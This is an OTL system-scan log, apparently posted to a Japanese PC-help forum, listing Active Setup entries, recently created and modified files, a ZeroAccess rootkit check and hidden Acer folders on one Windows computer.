ActiveX:[b]64bit:[/b] {89820200-ECBD-11cf-8B85-00AA005B4383} - C:\Windows\System32\ie4uinit.exe -BaseSettings
ActiveX:[b]64bit:[/b] {89B4C1CD-B018-4511-B0A1-5476DBF70820} - C:\Windows\system32\Rundll32.exe C:\Windows\system32\mscories.dll,Install
ActiveX:[b]64bit:[/b] {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.85\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
ActiveX:[b]64bit:[/b] {9381D8F2-0288-11D0-9501-00AA00B911A5} - Dynamic HTML Data Binding
ActiveX:[b]64bit:[/b] {C9E9A340-D1F1-11D0-821E-444553540600} - Internet Explorer Core Fonts
ActiveX:[b]64bit:[/b] {de5aed00-a4bf-11d1-9948-00c04f98bbc9} - HTML Help
ActiveX:[b]64bit:[/b] {E92B03AB-B707-11d2-9CBD-0000F87A369E} - Active Directory Service Interface
ActiveX:[b]64bit:[/b] {FEBEF00C-046D-438D-8A88-BF94A6C9E703} - .NET Framework
ActiveX:[b]64bit:[/b] >{22d6f312-b0f6-11d0-94ab-0080c74c7e95} - %SystemRoot%\system32\unregmp2.exe /ShowWMP
ActiveX:[b]64bit:[/b] >{26923b43-4d38-484f-9b9e-de460746276c} - C:\Windows\System32\ie4uinit.exe -UserIconConfig
ActiveX:[b]64bit:[/b] >{60B49E34-C7CC-11D0-8953-00A0C90347FF} - "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\iedkcs32.dll",BrandIEActiveSetup SIGNUP
ActiveX: {1AD147D0-BE0E-3D6C-AC11-64F6DC4163F1} - .NET Framework
ActiveX: {22d6f312-b0f6-11d0-94ab-0080c74c7e95} - Microsoft Windows Media Player 12.0
ActiveX: {23A20C3C-2ADD-4A80-AFB4-C146F8847D79} - .NET Framework
ActiveX: {26784146-6E05-3FF9-9335-786C7C0FB5BE} - .NET Framework
ActiveX: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll
ActiveX: {3af36230-a269-11d1-b5bf-0000f8051515} - Offline Browsing Pack
ActiveX: {44BBA840-CC51-11CF-AAFA-00AA00B6015C} - "%ProgramFiles(x86)%\Windows Mail\WinMail.exe" OCInstallUserConfigOE
ActiveX: {44BBA855-CC51-11CF-AAFA-00AA00B6015F} - DirectDrawEx
ActiveX: {45ea75a0-a269-11d1-b5bf-0000f8051515} - Internet Explorer Help
ActiveX: {4f645220-306d-11d2-995d-00c04f98bbc9} - Microsoft Windows Script 5.6
ActiveX: {5fd399c0-a70a-11d1-9948-00c04f98bbc9} - Internet Explorer Setup Tools
ActiveX: {630b1da0-b465-11d1-9948-00c04f98bbc9} - Browsing Enhancements
ActiveX: {6BF52A52-394A-11d3-B153-00C04F79FAA6} - Microsoft Windows Media Player
ActiveX: {6fab99d0-bab8-11d1-994a-00c04f98bbc9} - MSN Site Access
ActiveX: {7790769C-0471-11d2-AF11-00C04FA35D02} - Address Book 7
ActiveX: {7C028AF8-F614-47B3-82DA-BA94E41B1089} - .NET Framework
ActiveX: {7DEBE4EB-6B40-3766-BB35-5CBBC385DA37} - .NET Framework
ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4340} - regsvr32.exe /s /n /i:U shell32.dll
ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4383} - C:\Windows\SysWOW64\ie4uinit.exe -BaseSettings
ActiveX: {89B4C1CD-B018-4511-B0A1-5476DBF70820} - C:\Windows\SysWOW64\Rundll32.exe C:\Windows\SysWOW64\mscories.dll,Install
ActiveX: {9381D8F2-0288-11D0-9501-00AA00B911A5} - Dynamic HTML Data Binding
ActiveX: {C9E9A340-D1F1-11D0-821E-444553540600} - Internet Explorer Core Fonts
ActiveX: {de5aed00-a4bf-11d1-9948-00c04f98bbc9} - HTML Help
ActiveX: {E92B03AB-B707-11d2-9CBD-0000F87A369E} - Active Directory Service Interface
ActiveX: >{22d6f312-b0f6-11d0-94ab-0080c74c7e95} - %SystemRoot%\system32\unregmp2.exe /ShowWMP
ActiveX: >{26923b43-4d38-484f-9b9e-de460746276c} - C:\Windows\SysWOW64\ie4uinit.exe -UserIconConfig
ActiveX: >{60B49E34-C7CC-11D0-8953-00A0C90347FF} - "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\iedkcs32.dll",BrandIEActiveSetup SIGNUP

CREATERESTOREPOINT
Restore point Set: OTL Restore Point

[color=#E56717]========== Files/Folders - Created Within 30 Days ==========[/color]

[2015/09/14 16:41:16 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\Mozilla
[2015/09/14 16:41:16 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Local\Mozilla
[2015/09/14 16:41:06 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mozilla Firefox
[2015/09/13 16:43:11 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mozilla Maintenance Service
[2015/09/13 01:41:08 | 000,000,000 | ---D | C] -- C:\_OTL
[2015/09/12 10:35:26 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\【ユーザー名】\Desktop\OTL.exe
[2015/09/11 09:30:58 | 001,800,104 | ---- | C] (Malwarebytes Corporation) -- C:\Users\【ユーザー名】\Desktop\JRT.exe
[2015/09/10 16:11:43 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\Malwarebytes
[2015/09/10 16:11:10 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes
[2015/09/10 01:22:17 | 000,000,000 | ---D | C] -- C:\Windows\SoftwareDistribution
[2015/09/09 14:52:24 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome アプリ
[2015/09/09 08:39:07 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
[2015/09/09 08:38:43 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Local\Google
[2015/09/09 08:15:35 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\Desktop\chorome
[2015/09/09 06:13:13 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\Desktop\windows_update_fix
[2015/09/08 00:16:43 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\Desktop\hjt・ccログ
[2015/09/07 23:41:07 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\Geek Uninstaller
[2015/09/07 23:40:56 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\Desktop\geek
[2015/09/07 23:23:58 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
[2015/09/07 23:23:57 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\Skype
[2015/09/07 23:10:26 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\Java
[2015/09/07 23:10:14 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\Sun
[2015/09/07 23:10:14 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\.oracle_jre_usage
[2015/09/07 15:01:16 | 000,000,000 | ---D | C] -- C:\7b8eb74e5d1154427c6e2dbc
[2015/09/07 14:46:03 | 000,000,000 | ---D | C] -- C:\Windows\CheckSur
[2015/09/06 16:26:49 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\Windows Live Writer
[2015/09/06 16:26:49 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Local\Windows Live Writer
[2015/09/06 15:56:49 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
[2015/09/06 15:56:39 | 000,000,000 | ---D | C] -- C:\Program Files\CCleaner
[2015/09/06 15:53:36 | 000,000,000 | ---D | C] -- C:\Users\kaito\AppData\Roaming\Super PC Cleaner
[2015/09/06 10:28:10 | 002,241,936 | ---- | C] (Google Inc.) -- C:\Windows\SysNative\GIMEJa.ime
[2015/09/06 10:28:08 | 001,884,560 | ---- | C] (Google Inc.) -- C:\Windows\SysWow64\GIMEJa.ime
[2015/09/04 12:25:28 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
[2015/09/01 11:50:34 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\Desktop\TS
[2015/08/30 09:53:44 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\SeekerFunc
[2015/08/24 19:20:38 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\SystemForce
[2015/08/24 15:09:30 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
[2015/08/24 15:08:32 | 000,000,000 | ---D | C] -- C:\Program Files\iPod
[2015/08/24 15:08:30 | 000,000,000 | ---D | C] -- C:\Program Files\iTunes
[2015/08/24 15:08:30 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\iTunes
[2015/08/24 15:08:30 | 000,000,000 | ---D | C] -- C:\ProgramData\E1864A66-75E3-486a-BD95-D1B7D99A84A7
[2015/08/24 12:37:26 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\TaiG
[2015/08/18 13:56:19 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Microsoft OneDrive
[2015/08/18 13:56:16 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\OneDrive
[2015/08/18 13:55:52 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft OneDrive
[2015/08/18 04:48:00 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\BANDISOFT
[2015/08/18 04:48:00 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\Documents\Bandicam

[color=#E56717]========== Files - Modified Within 30 Days ==========[/color]

[2015/09/14 16:48:05 | 000,000,690 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2015/09/14 16:41:09 | 000,001,147 | ---- | M] () -- C:\Users\Public\Desktop\Mozilla Firefox.lnk
[2015/09/14 16:06:00 | 000,000,626 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2015/09/14 16:02:31 | 000,000,696 | ---- | M] () -- C:\Windows\tasks\DropboxUpdateTaskUserS-1-5-21-2268393351-900118556-74167924-1000UA.job
[2015/09/14 15:48:00 | 000,000,686 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2015/09/14 00:02:00 | 000,000,644 | ---- | M] () -- C:\Windows\tasks\DropboxUpdateTaskUserS-1-5-21-2268393351-900118556-74167924-1000Core.job
[2015/09/13 17:06:52 | 000,024,400 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2015/09/13 17:06:52 | 000,024,400 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2015/09/13 16:58:20 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2015/09/13 16:58:16 | 3094,102,016 | -HS- | M] () -- C:\hiberfil.sys
[2015/09/13 16:57:37 | 000,000,098 | ---- | M] () -- C:\Windows\SysNative\drivers\etc\Hosts
[2015/09/13 16:40:32 | 000,242,808 | ---- | M] () -- C:\Users\【ユーザー名】\Desktop\Firefox Setup Stub 40.0.3.exe
[2015/09/12 10:35:35 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\【ユーザー名】\Desktop\OTL.exe
[2015/09/11 09:31:03 | 001,800,104 | ---- | M] (Malwarebytes Corporation) -- C:\Users\【ユーザー名】\Desktop\JRT.exe
[2015/09/10 01:15:12 | 000,302,011 | ---- | M] () -- C:\Users\【ユーザー名】\Desktop\WindowsUpdateDiagnostic.diagcab
[2015/09/09 15:13:35 | 000,002,606 | ---- | M] () -- C:\Users\【ユーザー名】\Desktop\グランブルーファンタジー[ChromeApps版].lnk
[2015/09/09 08:43:59 | 000,002,265 | ---- | M] () -- C:\Users\【ユーザー名】\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2015/09/09 08:39:07 | 000,002,241 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2015/09/07 23:40:11 | 000,263,472 | ---- | M] () -- C:\Windows\SysNative\FNTCACHE.DAT
[2015/09/07 23:30:54 | 000,001,066 | ---- | M] () -- C:\Users\Public\Desktop\VLC media player.lnk
[2015/09/07 23:23:58 | 000,002,681 | ---- | M] () -- C:\Users\Public\Desktop\Skype.lnk
[2015/09/07 23:09:42 | 000,097,888 | ---- | M] (Oracle Corporation) -- C:\Windows\SysWow64\WindowsAccessBridge-32.dll
[2015/09/07 16:23:07 | 564,744,309 | ---- | M] () -- C:\Users\【ユーザー名】\Desktop\Windows6.1-KB947821-v34-x64.msu
[2015/09/07 13:31:21 | 002,582,815 | ---- | M] () -- C:\Users\【ユーザー名】\Desktop\geek.zip
[2015/09/06 15:56:49 | 000,000,826 | ---- | M] () -- C:\Users\Public\Desktop\CCleaner.lnk
[2015/09/06 10:28:10 | 002,241,936 | ---- | M] (Google Inc.) -- C:\Windows\SysNative\GIMEJa.ime
[2015/09/06 10:28:08 | 001,884,560 | ---- | M] (Google Inc.) -- C:\Windows\SysWow64\GIMEJa.ime
[2015/09/04 12:25:44 | 000,001,139 | ---- | M] () -- C:\Users\【ユーザー名】\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
[2015/08/24 15:09:30 | 000,001,787 | ---- | M] () -- C:\Users\Public\Desktop\iTunes.lnk

[color=#E56717]========== Files Created - No Company Name ==========[/color]

[2015/09/13 16:43:16 | 000,001,159 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
[2015/09/13 16:43:16 | 000,001,147 | ---- | C] () -- C:\Users\Public\Desktop\Mozilla Firefox.lnk
[2015/09/13 16:40:26 | 000,242,808 | ---- | C] () -- C:\Users\【ユーザー名】\Desktop\Firefox Setup Stub 40.0.3.exe
[2015/09/10 01:15:05 | 000,302,011 | ---- | C] () -- C:\Users\【ユーザー名】\Desktop\WindowsUpdateDiagnostic.diagcab
[2015/09/09 15:13:35 | 000,002,606 | ---- | C] () -- C:\Users\【ユーザー名】\Desktop\グランブルーファンタジー[ChromeApps版].lnk
[2015/09/09 08:39:07 | 000,002,265 | ---- | C] () -- C:\Users\【ユーザー名】\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2015/09/09 08:39:07 | 000,002,241 | ---- | C] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2015/09/07 16:13:27 | 564,744,309 | ---- | C] () -- C:\Users\【ユーザー名】\Desktop\Windows6.1-KB947821-v34-x64.msu
[2015/09/07 13:31:07 | 002,582,815 | ---- | C] () -- C:\Users\【ユーザー名】\Desktop\geek.zip
[2015/09/06 15:56:49 | 000,000,826 | ---- | C] () -- C:\Users\Public\Desktop\CCleaner.lnk
[2015/09/03 15:34:50 | 000,000,690 | ---- | C] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2015/09/03 15:34:50 | 000,000,686 | ---- | C] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2015/08/24 15:09:30 | 000,001,787 | ---- | C] () -- C:\Users\Public\Desktop\iTunes.lnk
[2015/08/18 13:56:19 | 000,002,094 | ---- | C] () -- C:\Users\【ユーザー名】\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft OneDrive.lnk
[2015/05/18 17:32:28 | 000,000,000 | ---- | C] () -- C:\Users\【ユーザー名】\AppData\Local\Temp.dat
[2015/05/06 07:26:47 | 000,000,079 | ---- | C] () -- C:\Program Files (x86)\prefs.js
[2014/12/13 21:29:15 | 000,007,605 | ---- | C] () -- C:\Users\【ユーザー名】\AppData\Local\Resmon.ResmonCfg
[2014/08/08 10:28:32 | 000,226,680 | ---- | C] () -- C:\Windows\SysWow64\PnkBstrB.exe
[2014/08/08 10:28:30 | 000,076,152 | ---- | C] () -- C:\Windows\SysWow64\PnkBstrA.exe
[2014/06/07 02:39:33 | 000,001,525 | ---- | C] () -- C:\Users\【ユーザー名】\AppData\Local\recently-used.xbel
[2014/05/23 00:34:21 | 000,000,347 | ---- | C] () -- C:\Users\【ユーザー名】\コンピューター - ショートカット.lnk
[2014/05/11 21:45:24 | 000,002,549 | ---- | C] () -- C:\Windows\wininit.ini
  • あすとろ
  • 2015/09/15 (Tue) 11:57:53
返信フォームへ 
OTL2
文字埋めです。

[color=#E56717]========== ZeroAccess Check ==========[/color]

[2009/07/14 13:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2015/02/13 14:22:33 | 014,177,280 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2015/02/13 14:26:18 | 012,875,264 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/14 10:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/21 12:24:25 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/14 10:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

[color=#E56717]========== Custom Scans ==========[/color]
[2013/08/08 09:40:21 | 000,000,000 | -H-D | M] -- C:\book
[2013/08/08 09:37:05 | 000,000,000 | -H-D | M] -- C:\Intel
[2014/04/01 21:30:57 | 000,000,000 | -H-D | M] -- C:\OEM
[2015/09/13 01:41:08 | 000,000,000 | -H-D | M] -- C:\ProgramData
[2014/04/02 15:30:11 | 000,000,000 | -H-D | M] -- C:\OEM\Registration
[2014/04/02 21:26:28 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\InstallShield Installation Information
[2013/08/08 09:47:02 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Temp
[2012/06/20 12:12:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\OOBEOffer\res\ThirdParty\Norton
[2012/06/20 11:59:20 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Registration\Acer
[2012/06/20 11:59:19 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Registration\Acer\Languages
[2012/06/20 11:59:20 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Registration\Acer\Pictures
[2012/06/20 11:59:20 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Registration\Acer\Settings
[2012/06/20 12:05:47 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Acer
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Common
[2012/06/20 12:05:47 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Acer\120
[2012/06/20 12:05:47 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Acer\144
[2012/06/20 12:05:47 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Acer\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\eSobi\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\eSobi\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\eSobi\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item100\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item100\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item100\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item101\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item101\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item101\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item107\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item107\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item107\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item108\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item108\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item108\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item109\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item109\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item109\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item110\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item110\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item110\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item131\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item131\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item131\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item135\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item135\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item135\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item138\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item138\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item138\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item142\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item142\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item142\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item162\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item162\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item162\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item163\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item163\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item163\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item170\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item170\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item170\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item171\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item171\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item171\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item180\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item180\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item180\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item181\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item181\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item181\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item190\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item190\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item190\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item191\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item191\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item191\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item21\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item21\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item21\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item22\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item22\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item22\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item30\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item30\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item30\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item31\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item31\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item31\96
